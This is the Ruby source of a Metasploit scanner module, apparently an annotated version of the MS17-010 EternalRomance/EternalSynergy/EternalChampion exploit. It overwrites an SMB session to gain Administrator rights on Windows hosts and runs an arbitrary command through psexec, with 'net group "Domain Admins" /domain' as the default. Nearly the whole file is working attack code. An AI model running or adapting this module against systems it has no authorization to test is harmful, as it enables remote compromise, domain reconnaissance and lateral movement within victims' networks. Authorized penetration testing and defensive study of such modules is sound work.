##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
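class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Declares the module metadata, references and datastore options.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',
      'Description' => %q{
        This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
        primitive. This will then be used to overwrite the connection session information with as an
        Administrator session. From there, the normal psexec command execution is done.

        Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
        Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
        exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
        named pipe.
      },
      'Author' => [
        'sleepya', # zzz_exploit idea and offsets
        'zerosum0x0',
        'Shadow Brokers',
        'Equation Group'
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'MSB', 'MS17-010' ],
        [ 'CVE', '2017-0143' ], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests
        [ 'CVE', '2017-0146' ], # EternalChampion/EternalSynergy - Race condition with Transaction requests
        [ 'CVE', '2017-0147' ], # for EternalRomance reference
        [ 'URL', 'https://github.com/worawit/MS17-010' ],
        [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
        [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ]
      ],
      'DisclosureDate' => '2017-03-14',
      'Notes' => {
        'AKA' => [
          'ETERNALSYNERGY',
          'ETERNALROMANCE',
          'ETERNALCHAMPION',
          'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred
        ],
        # smb_pwn hands a temporary .bat and .txt under \<WINPATH>\Temp to the
        # psexec mixin, so the run leaves files on the target for defenders to find.
        'SideEffects' => [ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),
      OptPort.new('RPORT', [true, 'The Target port', 445]),
      OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS'])
    ])

    register_advanced_options([
      OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files', '']),
      OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),
      OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0])
    ])

    deregister_options('SMB::ProtocolVersion')
  end

  # Scanner entry point, invoked once per target address.
  #
  # Runs the MS17-010 session-overwrite step and then the psexec command
  # execution. Module and network errors are printed rather than raised so
  # that one failing host does not abort the rest of the scan; the original
  # session state is restored in `ensure` regardless of outcome.
  #
  # @param ip [String] address of the current target host
  # @return [void]
  def run_host(ip)
    if datastore['SMBUser'].present?
      print_status("Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...")
    end

    eternal_pwn(ip) # obtain the Administrator session (provided by the included mixins)
    smb_pwn(ip)     # run the command over psexec
  rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e
    print_error(e.message)
  rescue ::Errno::ECONNRESET,
         ::Rex::HostUnreachable,
         ::Rex::Proto::SMB::Exceptions::LoginError,
         ::Rex::ConnectionTimeout,
         ::Rex::ConnectionRefused => e
    print_error("#{e.class}: #{e.message}")
  rescue => e
    # Anything unexpected: keep the backtrace so the failure can be diagnosed.
    print_error(e.class.to_s)
    print_error(e.message)
    print_error(e.backtrace.join("\n"))
  ensure
    eternal_cleanup # restore the session state touched by eternal_pwn
  end

  # Executes datastore['COMMAND'] on the target through the psexec mixin and
  # reports the captured output.
  #
  # Two randomly named temporary files under \<WINPATH>\Temp (optionally
  # prefixed by FILEPREFIX) are passed to execute_command_with_output; how
  # the mixin uses the .bat and .txt is its own concern. @smbshare and @ip
  # are set because the mixin reads them.
  #
  # @param ip [String] address of the current target host
  # @return [void]
  def smb_pwn(ip)
    @smbshare = datastore['SMBSHARE']
    @ip = ip

    prefix = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}"
    text = "#{prefix}#{Rex::Text.rand_text_alpha(16)}.txt"
    bat = "#{prefix}#{Rex::Text.rand_text_alpha(16)}.bat"

    output = execute_command_with_output(
      text, bat, datastore['COMMAND'], @smbshare, @ip,
      delay: datastore['DELAY'], retries: datastore['RETRY']
    )

    print_good('Command completed successfully!')
    print_status("Output for \"#{datastore['COMMAND']}\":\n")
    print_line("#{output}\n")

    # Attribute the note to the host actually exploited: run_host is called
    # per address, whereas datastore['RHOSTS'] may be a range or list and
    # would mislabel the finding in the database.
    report_note(
      rhost: ip,
      rport: datastore['RPORT'],
      type: 'psexec_command',
      name: datastore['COMMAND'],
      data: output
    )
  end
end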